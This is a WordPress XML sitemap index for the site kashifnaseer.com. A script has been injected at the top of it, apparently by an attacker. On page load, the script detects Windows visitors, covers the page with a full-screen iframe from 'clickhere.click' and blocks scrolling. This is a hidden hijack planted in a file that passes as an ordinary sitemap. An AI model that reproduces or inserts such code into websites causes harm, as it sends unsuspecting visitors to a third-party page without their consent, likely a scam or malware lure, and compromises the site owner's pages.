
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    top: '0px',
    left: '0',
    width: '100%',
    height: '100%',
    background: '#fff',
    zIndex: '9999',
    margin: '0',
    padding: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  // Блокируем прокрутку основной страницы
  document.body.style.overflow = 'hidden';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
    createModal('http://clickhere.click');
  }
});


</script>
<!-- /wpmbchik -->
<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet type='text/xml' href='//kashifnaseer.com/?wds_sitemap_styling=1&#038;template=sitemapIndexBody'?><!-- SMARTCRAWL SITEMAP -->
<sitemapindex
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd"
	xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
			<sitemap><loc>https://kashifnaseer.com/post-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/page-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/e-landing-page-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/elementor_library-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/cms_block-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/woodmart_size_guide-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/woodmart_slide-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/woodmart_sidebar-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/portfolio-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/product-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/category-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/post_tag-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/woodmart_slider-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/project-cat-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/product_cat-sitemap1.xml</loc></sitemap>			<sitemap><loc>https://kashifnaseer.com/product_tag-sitemap1.xml</loc></sitemap>	</sitemapindex>
